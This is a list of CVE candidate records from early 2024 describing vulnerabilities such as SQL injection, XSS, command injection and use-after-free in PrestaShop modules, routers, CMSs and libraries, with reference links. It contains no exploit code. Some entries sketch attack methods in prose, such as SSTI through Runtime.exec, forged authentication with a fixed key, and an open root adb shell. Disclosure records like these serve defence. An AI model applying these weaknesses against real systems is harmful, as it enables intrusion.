CVE    2024    2431    Candidate    An issue in the Palo Alto Networks GlobalProtect app enables a non-privileged user to disable the GlobalProtect app in configurations that allow a user to disable GlobalProtect with a passcode.    MISC:https://security.paloaltonetworks.com/CVE-2024-2431   |   URL:https://security.paloaltonetworks.com/CVE-2024-2431    Assigned (20240313)
CVE    2024    24309    Candidate    In the module "Survey TMA" (ecomiz_survey_tma) up to version 2.0.0 from Ecomiz for PrestaShop, a guest can download personal information without restriction.    MISC:https://security.friendsofpresta.org/modules/2024/02/20/ecomiz_survey_tma.html   |   MISC:https://www.ecomiz.com/    Assigned (20240125)
CVE    2024    24308    Candidate    SQL Injection vulnerability in Boostmyshop (boostmyshopagent) module for Prestashop versions 1.1.9 and before allows remote attackers to escalate privileges and obtain sensitive information via changeOrderCarrier.php, relayPoint.php, and shippingConfirmation.php.    MISC:https://security.friendsofpresta.org/modules/2024/02/08/boostmyshopagent.html    Assigned (20240125)
CVE    2024    24307    Candidate    Path Traversal vulnerability in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36 allows a remote attacker to escalate privileges and obtain sensitive information via the ajaxProcessCropImage() method.    MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-productdesigner-22.md    Assigned (20240125)
CVE    2024    24304    Candidate    In the module "Mailjet" (mailjet) from Mailjet for PrestaShop before version 3.5.1, a guest can download technical information without restriction.    MISC:https://github.com/mailjet/prestashop-mailjet-plugin-apiv3/releases/tag/v3.5.1   |   MISC:https://security.friendsofpresta.org/modules/2024/02/06/mailjet.html    Assigned (20240125)
CVE    2024    24303    Candidate    SQL Injection vulnerability in HiPresta "Gift Wrapping Pro" (hiadvancedgiftwrapping) module for PrestaShop before version 1.4.1 allows remote attackers to escalate privileges and obtain sensitive information via the HiAdvancedGiftWrappingGiftWrappingModuleFrontController::addGiftWrappingCartValue() method.    MISC:https://security.friendsofpresta.org/modules/2024/02/06/hiadvancedgiftwrapping.html    Assigned (20240125)
CVE    2024    24302    Candidate    An issue in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36 allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the postProcess() method.    MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-productdesigner-502.md    Assigned (20240125)
CVE    2024    24301    Candidate    Command Injection vulnerability discovered in 4ipnet EAP-767 device v3.42.00 within the web interface of the device allows attackers with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges.    MISC:https://github.com/yckuo-sdc/PoC    Assigned (20240125)
CVE    2024    24300    Candidate    4ipnet EAP-767 v3.42.00 is vulnerable to Incorrect Access Control. The device uses the same set of credentials: regardless of how many times a user logs in, the content of the cookie remains unchanged.    MISC:https://github.com/yckuo-sdc/PoC    Assigned (20240125)
CVE    2024    24291    Candidate    An issue in the component /member/index/login of yzmcms v7.0 allows attackers to direct users to malicious sites via a crafted URL.    MISC:https://gitee.com/wgd0ay/wgd0ay/issues/I8WSD1    Assigned (20240125)
CVE    2024    24278    Candidate    An issue in Teamwire Windows desktop client v.2.0.1 through v.2.4.0 allows a remote attacker to obtain sensitive information via a crafted payload to the message function.    MISC:https://research.hisolutions.com/2020/08/web-vulnerabilities-are-coming-to-the-desktop-again-rces-and-other-vulnerabilities-in-teamwire/    Assigned (20240125)
CVE    2024    24276    Candidate    Cross Site Scripting (XSS) vulnerability in Teamwire Windows desktop client v.2.0.1 through v.2.4.0 allows a remote attacker to obtain sensitive information via a crafted payload to the chat name, message preview, username and group name components.    MISC:https://research.hisolutions.com/2020/08/web-vulnerabilities-are-coming-to-the-desktop-again-rces-and-other-vulnerabilities-in-teamwire/    Assigned (20240125)
CVE    2024    24275    Candidate    Cross Site Scripting vulnerability in Teamwire Windows desktop client v.2.0.1 through v.2.4.0 allows a remote attacker to obtain sensitive information via a crafted payload to the global search function.    MISC:https://research.hisolutions.com/2020/08/web-vulnerabilities-are-coming-to-the-desktop-again-rces-and-other-vulnerabilities-in-teamwire/    Assigned (20240125)
CVE    2024    24272    Candidate    An issue in iTop DualSafe Password Manager & Digital Vault before 1.4.24 allows a local attacker to obtain sensitive information via leaked credentials as plaintext in a log file that can be accessed by the local user without knowledge of the master secret.    MISC:https://research.hisolutions.com/2024/03/cve-2024-24272-dualsafe-password-manager-leaks-credentials/    Assigned (20240125)
CVE    2024    2427    Candidate    A denial-of-service vulnerability exists in the Rockwell Automation PowerFlex® 527 due to improper traffic throttling in the device. If multiple data packets are sent to the device repeatedly the device will crash and require a manual restart to recover.    MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html   |   URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html    Assigned (20240313)
CVE    2024    24267    Candidate    gpac v2.2.1 was discovered to contain a memory leak via the gfio_blob variable in the gf_fileio_from_blob function.    MISC:https://github.com/yinluming13579/gpac_defects/blob/main/gpac_3.md    Assigned (20240125)
CVE    2024    24266    Candidate    gpac v2.2.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the dasher_configure_pid function at /src/filters/dasher.c.    MISC:https://github.com/yinluming13579/gpac_defects/blob/main/gpac_2.md    Assigned (20240125)
CVE    2024    24265    Candidate    gpac v2.2.1 was discovered to contain a memory leak via the dst_props variable in the gf_filter_pid_merge_properties_internal function.    MISC:https://github.com/yinluming13579/gpac_defects/blob/main/gpac_1.md    Assigned (20240125)
CVE    2024    24263    Candidate    Lotos WebServer v0.1.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the response_append_status_line function at /lotos/src/response.c.    MISC:https://github.com/LuMingYinDetect/lotos_detects/blob/main/lotos_detect_1.md    Assigned (20240125)
CVE    2024    24262    Candidate    media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_uac_stop_timer function at /uac/sip-uac-transaction.c.    MISC:https://github.com/LuMingYinDetect/media-server_detect/blob/main/media_server_detect_1.md    Assigned (20240125)
CVE    2024    24260    Candidate    media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_subscribe_remove function at /uac/sip-uac-subscribe.c.    MISC:https://github.com/yinluming13579/media-server_defects/blob/main/media-server_1.md    Assigned (20240125)
CVE    2024    2426    Candidate    A denial-of-service vulnerability exists in the Rockwell Automation PowerFlex® 527 due to improper input validation in the device. If exploited, a disruption in the CIP communication will occur and a manual restart will be required by the user to recover it.    MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html   |   URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html    Assigned (20240313)
CVE    2024    24259    Candidate    freeglut through 3.4.0 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function.    FEDORA:FEDORA-2024-0356803680   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IBAWX3HMMZVAWJZ3U6VOAYYOYJCN3IS/   |   FEDORA:FEDORA-2024-b69a4d75a1   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T43DAHPIWMGN54E4I6ABLHNYHZSTX7H5/   |   MISC:https://github.com/freeglut/freeglut/pull/155   |   MISC:https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_2.md    Assigned (20240125)
CVE    2024    24258    Candidate    freeglut 3.4.0 was discovered to contain a memory leak via the menuEntry variable in the glutAddSubMenu function.    FEDORA:FEDORA-2024-0356803680   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IBAWX3HMMZVAWJZ3U6VOAYYOYJCN3IS/   |   FEDORA:FEDORA-2024-b69a4d75a1   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T43DAHPIWMGN54E4I6ABLHNYHZSTX7H5/   |   MISC:https://github.com/freeglut/freeglut/pull/155   |   MISC:https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_1.md    Assigned (20240125)
CVE    2024    24256    Candidate    SQL Injection vulnerability in Yonyou space-time enterprise information integration platform v.9.0 and before allows an attacker to obtain sensitive information via the gwbhAIM parameter in the saveMove.jsp in the hr_position directory.    MISC:https://github.com/l8l1/killl.github.io/blob/main/3.md    Assigned (20240125)
CVE    2024    24255    Candidate    A Race Condition discovered in geofence.cpp and mission_feasibility_checker.cpp in PX4 Autopilot 1.14 and earlier allows attackers to send drones on unintended missions.    MISC:https://github.com/Drone-Lab/PX4-Autopilot/blob/report-the-faliure-of-precheck/report-the-faliure-of-precheck.md    Assigned (20240125)
CVE    2024    24254    Candidate    PX4 Autopilot 1.14 and earlier, due to the lack of synchronization mechanism for loading geofence data, has a Race Condition vulnerability in the geofence.cpp and mission_feasibility_checker.cpp. This will result in the drone uploading overlapping geofences and mission routes.    MISC:https://github.com/Drone-Lab/PX4-Autopilot/blob/report-can-not-pause-vulnerability/Multi-Threaded%20Race%20Condition%20bug%20found%20in%20PX4%20cause%20drone%20can%20not%20PAUSE.md   |   MISC:https://github.com/PX4/PX4-Autopilot    Assigned (20240125)
CVE    2024    2425    Candidate    A denial-of-service vulnerability exists in the Rockwell Automation PowerFlex® 527 due to improper input validation in the device. If exploited, the web server will crash and need a manual restart to recover it.    MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html   |   URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html    Assigned (20240313)
CVE    2024    24246    Candidate    Heap Buffer Overflow vulnerability in qpdf 11.9.0 allows attackers to crash the application via the std::__shared_count() function at /bits/shared_ptr_base.h.    FEDORA:FEDORA-2024-7d55be81bd   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3N6TULMEYVCLXO47Y5W4VWCJMSB72CB/   |   FEDORA:FEDORA-2024-8762164e47   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4WLK6ICPJUMOJNHZQWXAA5MPXG5JHZZL/   |   FEDORA:FEDORA-2024-daa7df59d6   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FX3D3YCNS6CQL3774OFUROLP3EM25ILC/   |   MISC:https://github.com/qpdf/qpdf/issues/1123    Assigned (20240125)
CVE    2024    24230    Candidate    Komm.One CMS 10.4.2.14 has a Server-Side Template Injection (SSTI) vulnerability via the Velocity template engine. It allows remote attackers to execute arbitrary code via a URL that specifies java.lang.Runtime in conjunction with getRuntime().exec followed by an OS command.    MISC:https://blog.munz4u.de/posts/2023/11/cve-2023-xxxxx-rce-via-ssti-in-komm.one-cms-10.4.2.14/    Assigned (20240125)
CVE    2024    24216    Candidate    Zentao v18.0 to v18.10 was discovered to contain a remote code execution (RCE) vulnerability via the checkConnection method of /app/zentao/module/repo/model.php.    MISC:https://github.com/easysoft/zentaopms/issues/133   |   MISC:https://github.com/l3s10n/ZenTaoPMS_RCE    Assigned (20240125)
CVE    2024    24215    Candidate    An issue in the component /cgi-bin/GetJsonValue.cgi of Cellinx NVT Web Server 5.0.0.014 allows attackers to leak configuration information via a crafted POST request.    MISC:https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24215   |   MISC:https://reference3.example.com//1.222.228.4/,   |   MISC:https://reference4.example.com    Assigned (20240125)
CVE    2024    24213    Candidate    ** DISPUTED ** Supabase PostgreSQL v15.1 was discovered to contain a SQL injection vulnerability via the component /pg_meta/default/query. NOTE: the vendor's position is that this is an intended feature; also, it exists in the Supabase dashboard product, not the Supabase PostgreSQL product. Specifically, /pg_meta/default/query is for SQL queries that are entered in an intended UI by an authorized user. Nothing is injected.    MISC:https://app.flows.sh:8443/project/default,   |   MISC:https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24213   |   MISC:https://postfixadmin.ballardini.com.ar:8443/project/default/logs/explorer.   |   MISC:https://reference1.example.com/project/default/logs/explorer,   |   MISC:https://supabase.com/docs/guides/database/overview#the-sql-editor    Assigned (20240125)
CVE    2024    24202    Candidate    An arbitrary file upload vulnerability in /upgrade/control.php of ZenTao Community Edition v18.10, ZenTao Biz v8.10, and ZenTao Max v4.10 allows attackers to execute arbitrary code via uploading a crafted .txt file.    MISC:https://clammy-blizzard-8ef.notion.site/Zentao-PMS-Authorized-Remote-Code-Execution-Vulnerability-1077a870c92848e18fe0c139c4fc2176    Assigned (20240125)
CVE    2024    24189    Candidate    Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c.    MISC:https://github.com/pcmacdon/jsish/issues/101    Assigned (20240125)
CVE    2024    24188    Candidate    Jsish v3.5.0 was discovered to contain a heap-buffer-overflow in ./src/jsiUtils.c.    MISC:https://github.com/pcmacdon/jsish/issues/100    Assigned (20240125)
CVE    2024    24186    Candidate    Jsish v3.5.0 (commit 42c694c) was discovered to contain a stack-overflow via the component IterGetKeysCallback at /jsish/src/jsiValue.c.    MISC:https://github.com/pcmacdon/jsish/issues/98    Assigned (20240125)
CVE    2024    2418    Candidate    A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view_order.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256705 was assigned to this vulnerability.    MISC:VDB-256705 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256705   |   MISC:VDB-256705 | SourceCodester Best POS Management System view_order.php sql injection   |   URL:https://vuldb.com/?id.256705   |   MISC:https://github.com/ycxdzj/CVE_Hunter/blob/main/SQLi-6.md   |   URL:https://github.com/ycxdzj/CVE_Hunter/blob/main/SQLi-6.md    Assigned (20240313)
CVE    2024    24161    Candidate    MRCMS 3.0 contains an Arbitrary File Read vulnerability in /admin/file/edit.do as the incoming path parameter is not filtered.    MISC:https://github.com/wy876/cve/issues/2    Assigned (20240125)
CVE    2024    24160    Candidate    MRCMS 3.0 contains a Cross-Site Scripting (XSS) vulnerability via /admin/system/saveinfo.do.    MISC:https://github.com/wy876/cve/issues/1    Assigned (20240125)
CVE    2024    2416    Candidate    Cross-Site Request Forgery vulnerability in Movistar's 4G router affecting version ES_WLD71-T1_v2.0.201820. This vulnerability allows an attacker to force an end user to execute unwanted actions in a web application in which they are currently authenticated.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router    Assigned (20240313)
CVE    2024    24156    Candidate    Cross Site Scripting (XSS) vulnerability in Gnuboard g6 before Github commit 58c737a263ac0c523592fd87ff71b9e3c07d7cf5 allows remote attackers to execute arbitrary code via the wr_content parameter.    MISC:https://github.com/gnuboard/g6/issues/316    Assigned (20240125)
CVE    2024    24155    Candidate    Bento4 v1.5.1-628 contains a memory leak in AP4_Movie::AP4_Movie: tracks are parsed and added to the m_Tracks list, but mp42aac does not correctly delete them when a "no audio track found" error occurs. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file.    MISC:https://github.com/axiomatic-systems/Bento4/issues/919    Assigned (20240125)
CVE    2024    24150    Candidate    A memory leak issue discovered in parseSWF_TEXTRECORD in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.    MISC:https://github.com/libming/libming/issues/309    Assigned (20240125)
CVE    2024    2415    Candidate    Command injection vulnerability in Movistar 4G router affecting version ES_WLD71-T1_v2.0.201820. This vulnerability allows an authenticated user to execute commands inside the router by making a POST request to the URL '/cgi-bin/gui.cgi'.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router    Assigned (20240313)
CVE    2024    24149    Candidate    A memory leak issue discovered in parseSWF_GLYPHENTRY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.    MISC:https://github.com/libming/libming/issues/310    Assigned (20240125)
CVE    2024    24148    Candidate    A memory leak issue discovered in parseSWF_FREECHARACTER in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.    MISC:https://github.com/libming/libming/issues/308    Assigned (20240125)
CVE    2024    24147    Candidate    A memory leak issue discovered in parseSWF_FILLSTYLEARRAY in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.    MISC:https://github.com/libming/libming/issues/311    Assigned (20240125)
CVE    2024    24146    Candidate    A memory leak issue discovered in parseSWF_DEFINEBUTTON in libming v0.4.8 allows attackers to cause a denial of service via a crafted SWF file.    MISC:https://github.com/libming/libming/issues/307    Assigned (20240125)
CVE    2024    24142    Candidate    Sourcecodester School Task Manager 1.0 allows SQL Injection via the 'subject' parameter.    MISC:https://github.com/BurakSevben/School-Task-Manager-SQL-Injection-2    Assigned (20240125)
CVE    2024    24141    Candidate    Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter.    MISC:https://github.com/BurakSevben/School-Task-Manager-System-SQLi-1    Assigned (20240125)
CVE    2024    24140    Candidate    Sourcecodester Daily Habit Tracker App 1.0 allows SQL Injection via the parameter 'tracker.'    MISC:https://github.com/BurakSevben/Daily_Habit_Tracker_App_SQL_Injection    Assigned (20240125)
CVE    2024    2414    Candidate    The primary channel is unprotected on Movistar 4G router affecting version ES_WLD71-T1_v2.0.201820. This device has the 'adb' service open on port 5555 and provides access to a shell with root privileges.    MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router   |   URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-movistar-4g-router    Assigned (20240313)
CVE    2024    24139    Candidate    Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter.    MISC:https://github.com/BurakSevben/Login_System_with_Email_Verification_SQL_Injection/    Assigned (20240125)
CVE    2024    24136    Candidate    The 'Your Name' field in the Submit Score section of Sourcecodester Math Game with Leaderboard v1.0 is vulnerable to Cross-Site Scripting (XSS) attacks.    MISC:https://github.com/BurakSevben/2024_Math_Game_XSS    Assigned (20240125)
CVE    2024    24135    Candidate    Product Name and Product Code in the 'Add Product' section of Sourcecodester Product Inventory with Export to Excel 1.0 are vulnerable to XSS attacks.    MISC:https://github.com/BurakSevben/2024_Product_Inventory_with_Export_to_Excel_XSS/    Assigned (20240125)
CVE    2024    24134    Candidate    Sourcecodester Online Food Menu 1.0 is vulnerable to Cross Site Scripting (XSS) via the 'Menu Name' and 'Description' fields in the Update Menu section.    MISC:https://github.com/BurakSevben/2024_Online_Food_Menu_XSS/    Assigned (20240125)
CVE    2024    24133    Candidate    ** UNSUPPORTED WHEN ASSIGNED ** Atmail v6.6.0 was discovered to contain a SQL injection vulnerability via the username parameter on the login page.    MISC:https://github.com/Hebing123/cve/issues/16    Assigned (20240125)
CVE    2024    24131    Candidate    SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component api.php.    MISC:https://github.com/Hebing123/cve/issues/14    Assigned (20240125)
CVE    2024    24130    Candidate    Mail2World v12 Business Control Center was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Usr parameter at resellercenter/login.asp.    MISC:https://github.com/Hebing123/cve/issues/13    Assigned (20240125)
CVE    2024    2413    Candidate    Intumit SmartRobot uses a fixed encryption key for authentication. Remote attackers can use this key to encrypt a string composed of the user's name and timestamp to generate an authentication code. With this authentication code, they can obtain administrator privileges and subsequently execute arbitrary code on the remote server using built-in system functionality.    MISC:https://www.twcert.org.tw/tw/cp-132-7697-ecf10-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7697-ecf10-1.html    Assigned (20240313)
CVE    2024    2412    Candidate    The disabling function of the user registration page for Heimavista Rpage and Epage is not properly implemented, allowing remote attackers to complete user registration on sites where user registration is supposed to be disabled.    MISC:https://www.twcert.org.tw/tw/cp-132-7696-0951f-1.html   |   URL:https://www.twcert.org.tw/tw/cp-132-7696-0951f-1.html    Assigned (20240313)
CVE    2024    24115    Candidate    A stored cross-site scripting (XSS) vulnerability in the Edit Page function of Cotonti CMS v0.9.24 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload.    MISC:https://mechaneus.github.io/CVE-2024-24115.html    Assigned (20240125)
CVE    2024    24113    Candidate    xxl-job <= 2.4.1 has a Server-Side Request Forgery (SSRF) vulnerability, which allows low-privileged users to control the executor to achieve RCE.    MISC:https://github.com/xuxueli/xxl-job/issues/3375    Assigned (20240125)
CVE    2024    24112    Candidate    xmall v1.1 was discovered to contain a SQL injection vulnerability via the orderDir parameter.    MISC:https://github.com/Exrick/xmall/issues/78    Assigned (20240125)
CVE    2024    24110    Candidate    SQL Injection vulnerability in crmeb_java before v1.3.4 allows attackers to run arbitrary SQL commands via crafted GET request to the component /api/front/spread/people.    MISC:https://github.com/crmeb/crmeb_java/issues/13    Assigned (20240125)
CVE    2024    24105    Candidate    SQL Injection vulnerability in Code-projects Computer Science Time Table System 1.0 allows attackers to run arbitrary code via adminFormvalidation.php.    MISC:https://github.com/ASR511-OO7/CVE-2024-24105/blob/main/CVE-40    Assigned (20240125)
CVE    2024    24101    Candidate    Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Eligibility Information Update.    MISC:https://github.com/ASR511-OO7/CVE-2024-24101/blob/main/CVE-14    Assigned (20240125)
CVE    2024    24100    Candidate    Code-projects Computer Book Store 1.0 is vulnerable to SQL Injection via PublisherID.    MISC:https://github.com/ASR511-OO7/CVE-2024-24100/blob/main/CVE-18    Assigned (20240125)
CVE    2024    24099    Candidate    Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection under Employment Status Information Update.    MISC:https://github.com/ASR511-OO7/CVE-2024-24099/blob/main/CVE-19    Assigned (20240125)
CVE    2024    24098    Candidate    Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection via the News Feed.    MISC:https://code-projects.org/scholars-tracking-system-in-php-with-source-code/   |   MISC:https://github.com/ASR511-OO7/CVE-2024-24098/blob/main/CVE-13    Assigned (20240125)
CVE    2024    24097    Candidate    Cross Site Scripting (XSS) vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via the News Feed.    MISC:https://github.com/ASR511-OO7/CVE-2024-24097/blob/main/CVE-12    Assigned (20240125)
CVE    2024    24096    Candidate    Code-projects Computer Book Store 1.0 is vulnerable to SQL Injection via BookSBIN.    MISC:https://github.com/ASR511-OO7/CVE-2024-24096/blob/main/CVE-20    Assigned (20240125)
CVE    2024    24095    Candidate    Code-projects Simple Stock System 1.0 is vulnerable to SQL Injection.    MISC:https://github.com/ASR511-OO7/CVE-2024-24095/blob/main/CVE-21    Assigned (20240125)
CVE    2024    24093    Candidate    SQL Injection vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via Personal Information Update information.    MISC:https://github.com/ASR511-OO7/CVE-2024-24093/blob/main/CVE-10    Assigned (20240125)
CVE    2024    24092    Candidate    SQL Injection vulnerability in Code-projects.org Scholars Tracking System 1.0 allows attackers to run arbitrary code via login.php.    MISC:https://github.com/ASR511-OO7/CVE-2024-24092/blob/main/CVE-9    Assigned (20240125)
CVE    2024    24091    Candidate    Yealink Meeting Server before v26.0.0.66 was discovered to contain an OS command injection vulnerability via the file upload interface.    MISC:https://www.yealink.com/en/trust-center/security-advisories/2f2b990211c440cf    Assigned (20240125)
CVE    2024    24062    Candidate    springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/role.    MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#12-stored-cross-site-scripting-sysrole    Assigned (20240125)
CVE    2024    24061    Candidate    springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sysContent/add.    MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#13-stored-cross-site-scripting-syscontentadd    Assigned (20240125)
CVE    2024    24060    Candidate    springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/user.    MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#11-stored-cross-site-scripting-sysuser    Assigned (20240125)
CVE    2024    2406    Candidate    A vulnerability, which was classified as critical, was found in Gacjie Server up to 1.0. This affects the function index of the file /app/admin/controller/Upload.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256503.    MISC:VDB-256503 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256503   |   MISC:VDB-256503 | Gacjie Server Upload.php index unrestricted upload   |   URL:https://vuldb.com/?id.256503   |   MISC:https://note.zhaoj.in/share/7kZiVRqSuiMx   |   URL:https://note.zhaoj.in/share/7kZiVRqSuiMx    Assigned (20240312)
CVE    2024    24059    Candidate    springboot-manager v1.6 is vulnerable to Arbitrary File Upload. The system does not filter the suffixes of uploaded files.    MISC:https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#2-file-upload-vulnerability    Assigned (20240125)
CVE    2024    24050    Candidate    Cross Site Scripting (XSS) vulnerability in Sourcecodester Workout Journal App 1.0 allows attackers to run arbitrary code via parameters firstname and lastname in /add-user.php.    MISC:https://www.muratcagrialis.com/workout-journal-app-stored-xss-cve-2024-24050    Assigned (20240125)
CVE    2024    24043    Candidate    Directory Traversal vulnerability in Speedy11CZ MCRPX v.1.4.0 and before allows a local attacker to execute arbitrary code via a crafted file.    MISC:https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed   |   MISC:https://github.com/Speedy11CZ/mcrpx/commit/02ca6d1fd851567560046766ac9d04d20db35b8e   |   MISC:https://github.com/Speedy11CZ/mcrpx/releases/tag/v1.4.1    Assigned (20240125)
CVE    2024    24042    Candidate    Directory Traversal vulnerability in Devan-Kerman ARRP v.0.8.1 and before allows a remote attacker to execute arbitrary code via the dumpDirect in RuntimeResourcePackImpl component.    MISC:https://gist.github.com/apple502j/193358682885fe1a6708309ce934e4ed   |   MISC:https://github.com/Devan-Kerman/ARRP/commit/7ea80db462c8bf66a0565e84fa49c1f2ecb9287b    Assigned (20240125)
CVE    2024    24041    Candidate    A stored cross-site scripting (XSS) vulnerability in Travel Journal Using PHP and MySQL with Source Code v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the location parameter at /travel-journal/write-journal.php.    MISC:https://github.com/tubakvgc/CVE/blob/main/Travel_Journal_App.md   |   MISC:https://portswigger.net/web-security/cross-site-scripting    Assigned (20240125)
CVE    2024    24035    Candidate    Cross Site Scripting (XSS) vulnerability in Setor Informatica SIL 3.1 allows attackers to run arbitrary code via the hmessage parameter.    MISC:https://github.com/ELIZEUOPAIN/CVE-2024-24035/tree/main    Assigned (20240125)
CVE    2024    24034    Candidate    Setor Informatica S.I.L version 3.0 is vulnerable to Open Redirect via the hprinter parameter, which allows remote attackers to execute arbitrary code.    MISC:https://github.com/ELIZEUOPAIN/CVE-2024-24034/tree/main    Assigned (20240125)
CVE    2024    2403    Candidate    Improper cleanup in temporary file handling component in Devolutions Remote Desktop Manager 2024.1.12 and earlier on Windows allows an attacker that compromised a user endpoint, under specific circumstances, to access sensitive information via residual files in the temporary directory.    MISC:https://devolutions.net/security/advisories/DEVO-2024-0004   |   URL:https://devolutions.net/security/advisories/DEVO-2024-0004    Assigned (20240312)
CVE    2024    24029    Candidate    JFinalCMS 5.0.0 is vulnerable to SQL injection via /admin/content/data.    MISC:https://gitee.com/heyewei/JFinalcms/issues/I8VE52    Assigned (20240125)
CVE    2024    24028    Candidate    Server Side Request Forgery (SSRF) vulnerability in Likeshop before 2.5.7 allows attackers to view sensitive information via the avatar parameter in function UserLogic::updateWechatInfo.    MISC:https://thanhlo.substack.com/p/khai-thac-lo-hong-cve-2024-24028    Assigned (20240125)
CVE    2024    24027    Candidate    SQL Injection vulnerability in Likeshop before 2.5.7 allows attackers to run arbitrary SQL commands via the function DistributionMemberLogic::getFansLists.    MISC:https://samyueru.substack.com/p/cve-2024-24027-sql-injection-trong-likeshop    Assigned (20240125)
CVE    2024    24026    Candidate    An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior versions at com.java2nb.system.controller.SysUserController: uploadImg(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download.    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24026.txt    Assigned (20240125)
CVE    2024    24025    Candidate    An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: upload(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download.    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24025.txt    Assigned (20240125)
CVE    2024    24024    Candidate    An arbitrary File download vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: fileDownload(). An attacker can pass in specially crafted filePath and fieName parameters to perform arbitrary File download.    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24024.txt    Assigned (20240125)
CVE    2024    24023    Candidate    A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/bookContent/list.    MISC:https://github.com/201206030/novel-plus   |   MISC:https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24023.txt    Assigned (20240125)
